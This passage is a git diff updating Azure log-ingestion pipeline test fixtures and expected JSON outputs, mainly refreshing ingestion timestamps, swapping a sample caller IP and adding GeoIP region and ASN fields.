b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json @@ -13,7 +13,7 @@ }, "event": { "action": "Microsoft.Resourcehealth/healthevent/Updated/action", - "ingested": "2021-06-14T09:02:47.229627300Z", + "ingested": "2021-12-09T13:30:56.909152600Z", "original": "{\"category\":\"ResourceHealth\",\"correlationId\":\"1c867fe2-050c-4a74-bb1c-a83b15246fdd\",\"level\":\"Information\",\"operationName\":\"Microsoft.Resourcehealth/healthevent/Updated/action\",\"properties\":{\"eventCategory\":\"ResourceHealth\",\"eventProperties\":{\"cause\":\"PlatformInitiated\"}},\"resourceId\":\"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.domainRegistration\",\"resultType\":\"Updated\",\"time\":\"2021-05-25T22:04:07.22Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log index 0f46c761819..d5c8c1930cd 100644 --- a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log +++ b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log @@ -1 +1 @@ -{"callerIpAddress":"51.251.141.41","category":"Action","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":{"authorization":{"action":"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action","evidence":{"principalId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","principalType":"ServicePrincipal","role":"Azure EventGrid Service BuiltIn Role","roleAssignmentId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","roleAssignmentScope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53","roleDefinitionId":"8a4de8b5-095c-47d0-a96f-a75130c61d53"},"scope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey"},"claims":{"aio":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appidacr":"2","aud":"https://management.core.windows.net/","exp":"1571904826","http://schemas.microsoft.com/identity/claims/identityprovider":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","http://schemas.microsoft.com/identity/claims/objectidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.microsoft.com/identity/claims/tenantid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","iat":"1571875726","iss":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","nbf":"1571875726","uti":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ver":"1.0"}},"level":"Information","location":"global","operationName":"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION","resourceId":"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY","resultSignature":"Started.","resultType":"Start","time":"2019-10-24T00:13:46.3554259Z"} \ No newline at end of file +{"callerIpAddress":"81.2.69.144","category":"Action","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":{"authorization":{"action":"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action","evidence":{"principalId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","principalType":"ServicePrincipal","role":"Azure EventGrid Service BuiltIn Role","roleAssignmentId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","roleAssignmentScope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53","roleDefinitionId":"8a4de8b5-095c-47d0-a96f-a75130c61d53"},"scope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey"},"claims":{"aio":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appidacr":"2","aud":"https://management.core.windows.net/","exp":"1571904826","http://schemas.microsoft.com/identity/claims/identityprovider":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","http://schemas.microsoft.com/identity/claims/objectidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.microsoft.com/identity/claims/tenantid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","iat":"1571875726","iss":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","nbf":"1571875726","uti":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ver":"1.0"}},"level":"Information","location":"global","operationName":"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION","resourceId":"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY","resultSignature":"Started.","resultType":"Start","time":"2019-10-24T00:13:46.3554259Z"} \ No newline at end of file diff --git a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json index f52fea5c8e5..14d6f56a662 100644 --- a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json +++ b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json @@ -7,26 +7,38 @@ "source": { "geo": { "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -0.1224, - "lat": 51.4964 - }, - "country_iso_code": "GB" + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } }, - "ip": "51.251.141.41" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" ], "geo": { "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -0.1224, - "lat": 51.4964 - }, - "country_iso_code": "GB" + "lon": -1.3614, + "lat": 51.7095 + } }, "cloud": { "provider": "azure" @@ -37,17 +49,17 @@ }, "related": { "ip": [ - "51.251.141.41" + "81.2.69.144" ] }, "client": { - "ip": "51.251.141.41" + "ip": "81.2.69.144" }, "event": { "duration": 0, "action": "MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION", - "ingested": "2021-06-14T09:02:47.279653200Z", - "original": "{\"callerIpAddress\":\"51.251.141.41\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}", + "ingested": "2021-12-09T13:30:56.983745700Z", + "original": "{\"callerIpAddress\":\"81.2.69.144\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}", "type": [ "change" ], diff --git a/packages/azure/data_stream/activitylogs/fields/ecs.yml b/packages/azure/data_stream/activitylogs/fields/ecs.yml index d259ad88592..1839a0db982 100644 --- a/packages/azure/data_stream/activitylogs/fields/ecs.yml +++ b/packages/azure/data_stream/activitylogs/fields/ecs.yml @@ -72,6 +72,10 @@ external: ecs - name: geo.city_name external: ecs +- name: geo.region_name + external: ecs +- name: geo.region_iso_code + external: ecs - name: log.level external: ecs - name: source.geo.city_name diff --git a/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json b/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json index 313a44ca977..cf3e1022d17 100644 --- a/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json +++ b/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json @@ -14,7 +14,7 @@ "event": { "duration": 0, "action": "Update device", - "ingested": "2021-06-14T09:02:47.682701100Z", + "ingested": "2021-12-09T13:30:57.501235200Z", "original": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":\"id\",\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":\"Core\"}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":\"\"}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "kind": "event", "outcome": "success" diff --git a/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json b/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json index a3c466524c5..bf1e67974ba 100644 --- a/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json +++ b/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json @@ -4,10 +4,11 @@ "ecs": { "version": "1.12.0" }, + "message": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":\"id\",\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":\"Core\"}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":\"\"}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "event": { + "ingested": "2021-12-09T13:30:57.966322200Z", "kind": "event" }, - "message": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":\"id\",\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":\"Core\"}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":\"\"}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "tags": [ "preserve_original_event" ] diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json index 0d9725fd5f3..17cd84347c1 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "ApplicationGatewayAccess", - "ingested": "2021-06-14T09:02:47.887108Z", + "ingested": "2021-12-09T13:30:58.364774600Z", "original": "{ \"resourceId\": \"/SUBSCRIPTIONS/SUBSCRIPTION/RESOURCEGROUPS/ET-AZURE-INTEGRATION-TESTING/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/LANGERGATEWAY\", \"operationName\": \"ApplicationGatewayAccess\", \"time\": \"2020-10-11T20:30:59Z\", \"category\": \"ApplicationGatewayAccessLog\", \"properties\": {\"instanceId\":\"ApplicationGatewayRole_IN_1\",\"clientIP\":\"172.105.13.165\",\"clientPort\":18234,\"httpMethod\":\"GET\",\"requestUri\":\"/nmaplowercheck1602448229\",\"requestQuery\":\"X-AzureApplicationGateway-CACHE-HIT=0\",\"userAgent\":\"Mozilla/5.0\",\"httpStatus\":502,\"httpVersion\":\"HTTP/1.1\",\"receivedBytes\":108,\"sentBytes\":1636,\"timeTaken\":78,\"sslEnabled\":\"off\",\"host\":\"IP\",\"originalHost\":\"IP\"}},{ \"resourceId\": \"/SUBSCRIPTIONS/SUBSCRIPTION/RESOURCEGROUPS/ET-AZURE-INTEGRATION-TESTING/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/LANGERGATEWAY\", \"operationName\": \"ApplicationGatewayAccess\", \"time\": \"2020-10-11T20:30:59Z\", \"category\": \"ApplicationGatewayAccessLog\", \"properties\": {\"instanceId\":\"ApplicationGatewayRole_IN_1\",\"clientIP\":\"172.105.13.165\",\"clientPort\":18706,\"httpMethod\":\"GET\",\"requestUri\":\"/evox/about\",\"requestQuery\":\"X-AzureApplicationGateway-CACHE-HIT=0\",\"userAgent\":\"Mozilla/5.0\",\"httpStatus\":502,\"httpVersion\":\"HTTP/1.1\",\"receivedBytes\":94,\"sentBytes\":1636,\"timeTaken\":62,\"sslEnabled\":\"off\",\"host\":\"IP\",\"originalHost\":\"IP\"}}]}", "kind": "event" }, diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json index b0cebb8e372..992b7187041 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "Microsoft.ContainerService/managedClusters/diagnosticLogs/Read", - "ingested": "2021-06-14T09:02:47.903575800Z", + "ingested": "2021-12-09T13:30:58.413839200Z", "original": "{\"Cloud\":\"AzureCloud\",\"Environment\":\"prod\",\"category\":\"kube-audit\",\"ccpNamespace\":\"5e4bf4baee195b00017cdbfa\",\"operationName\":\"Microsoft.ContainerService/managedClusters/diagnosticLogs/Read\",\"properties\":{\"log\":\"{\\\"kind\\\":\\\"Event\\\"}\",\"pod\":\"kube-apiserver-666bd4b459-hjgdc\"},\"resourceId\":\"/SUBSCRIPTIONS/70BD6E77-4B1E-4835-8896-DB77B8EEF364/RESOURCEGROUPS/OBS-INFRASTRUCTURE/PROVIDERS/MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/OBSKUBE\",\"time\":\"2020-11-09T10:57:31.0000000Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json index 7874bbc8ca6..7b7dd9ec56c 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json @@ -11,7 +11,7 @@ }, "event": { "action": "Retreive ConsumerGroup", - "ingested": "2021-06-14T09:02:47.924002Z", + "ingested": "2021-12-09T13:30:58.470556500Z", "original": "{\"ActivityId\":\"30ed877c-a36b-491a-bd4d-ddd847fe55b8\",\"Caller\":\"Portal\",\"Environment\":\"PROD\",\"EventName\":\"Retreive ConsumerGroup\",\"EventProperties\":\"{\\\"SubscriptionId\\\":\\\"7657426d-c4c3-44ac-88a2-3b2cd59e6dba\\\",\\\"Namespace\\\":\\\"obstesteventhubs\\\",\\\"Via\\\":\\\"sb://obstesteventhubs.servicebus.windows.net/insights-logs-operationallogs/consumergroups?api-version=2017-04\\u0026$skip=0\\u0026$top=100\\\",\\\"TrackingId\\\":\\\"30ed877c-a36b-491a-bd4d-ddd847fe55b8_M2CH3_M2CH3_G3S2\\\"}\",\"EventTimeString\":\"11/3/2020 9:06:42 AM +00:00\",\"Region\":\"West Europe\",\"ScaleUnit\":\"PROD-AM3-AZ501\",\"Status\":\"Succeeded\",\"category\":\"OperationalLogs\",\"resourceId\":\"/SUBSCRIPTIONS/7657426D-C4C3-44AC-88A2-3B2CD59E6DBA/RESOURCEGROUPS/OBS-TEST/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/OBSTESTEVENTHUBS\"}", "kind": "event", "outcome": "succeeded" @@ -56,7 +56,7 @@ }, "event": { "action": "Retreive ConsumerGroup", - "ingested": "2021-06-14T09:02:47.924023Z", + "ingested": "2021-12-09T13:30:58.470564700Z", "original": "{\"ActivityId\":\"30ed877c-a36b-491a-bd4d-ddd847fe55b8\",\"Caller\":\"Portal\",\"Environment\":\"PROD\",\"EventName\":\"Retreive ConsumerGroup\",\"EventProperties\":\"{\\\"SubscriptionId\\\":\\\"7657426d-c4c3-44ac-88a2-3b2cd59e6dba\\\",\\\"Namespace\\\":\\\"obstesteventhubs\\\"}\",\"EventTimeString\":\"11/3/2020 9:06:42 AM +00:00\",\"Region\":\"West Europe\",\"ScaleUnit\":\"PROD-AM3-AZ501\",\"Status\":\"Succeeded\",\"category\":\"OperationalLogs\",\"resourceId\":\"/SUBSCRIPTIONS/7657426D-C4C3-44AC-88A2-3B2CD59E6DBA/RESOURCEGROUPS/OBS-TEST/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/OBSTESTEVENTHUBS\"}", "kind": "event", "outcome": "succeeded" diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json index f5657cea1a9..25ab37c8c0a 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "Microsoft.ContainerService/managedClusters/diagnosticLogs/Read", - "ingested": "2021-06-14T09:02:47.965542200Z", + "ingested": "2021-12-09T13:30:58.573546900Z", "original": "{\"Cloud\":\"AzureCloud\",\"Environment\":\"prod\",\"category\":\"kube-audit\",\"ccpNamespace\":\"5e4bf4baee195b00017cdbfa\",\"operationName\":\"Microsoft.ContainerService/managedClusters/diagnosticLogs/Read\",\"properties\":{\"log\":\"{\\\"kind\\\":\\\"Event\\\",\\\"apiVersion\\\":\\\"audit.k8s.io/v1\\\",\\\"level\\\":\\\"Metadata\\\",\\\"auditID\\\":\\\"22af12c3-a1fe-4f2c-99a9-3cdde671dbfe\\\"}\",\"pod\":\"kube-apiserver-666bd4b459-hjgdc\",\"stream\":\"stdout\"},\"resourceId\":\"/SUBSCRIPTIONS/70BD6E77-4B1E-4835-8896-DB77B8EEF364/RESOURCEGROUPS/OBS-INFRASTRUCTURE/PROVIDERS/MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/OBSKUBE\",\"time\":\"2020-11-09T10:57:31.0000000Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json index bbd41afb415..e65b5cdaed5 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json @@ -21,7 +21,7 @@ }, "event": { "duration": 0, - "ingested": "2021-09-28T19:32:36.351618100Z", + "ingested": "2021-12-09T13:30:58.981445700Z", "original": "{\"Level\":4,\"category\":\"ManagedIdentitySignInLogs\",\"correlationId\":\"22222222-92d0-4887-9ead-46258539a699\",\"durationMs\":0,\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-b540-4792-a2a2-81818990a95b\",\"correlationId\":\"22222222-92d0-4887-9ead-46258539a699\",\"createdDateTime\":\"2021-01-23T20:44:29.7688982+00:00\",\"flaggedForReview\":false,\"id\":\"22222222-0b57-4b77-bf1a-317a88591a00\",\"ipAddress\":\"\",\"isInteractive\":false,\"location\":{\"city\":\"\",\"countryOrRegion\":\"\",\"geoCoordinates\":{\"latitude\":0,\"longitude\":0},\"state\":\"\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Windows Azure Service Management API\",\"resourceId\":\"22222222-ba00-4fd7-ba43-dac1f8f63013\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-864d-4e00-9882-ff649530f186\",\"servicePrincipalName\":\"ASC provisioning Dependency agent for Linux\",\"status\":{\"errorCode\":0},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/tenantId/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"tenantId\",\"time\":\"2021-01-23T20:44:29.7688982Z\"}", "kind": "event", "action": "Sign-in activity", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log index 9d4e5f92861..de22f9d88e8 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log @@ -1 +1 @@ -{"Level":4,"callerIpAddress":"11.22.33.44","category":"NonInteractiveUserSignInLogs","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","durationMs":0,"identity":"Hello World","location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Microsoft Teams","appId":"22222222-bce4-4aaf-ab1b-5451cc387264","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":0,"conditionsSatisfied":7,"displayName":"01 - Require Windows Hybrid AD Joined Device","enforcedGrantControls":["RequireDomainJoinedDevice"],"enforcedSessionControls":[],"id":"22222222-b7da-4d9e-ae41-779c5c256ac8","result":"success"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"05 - MFA für 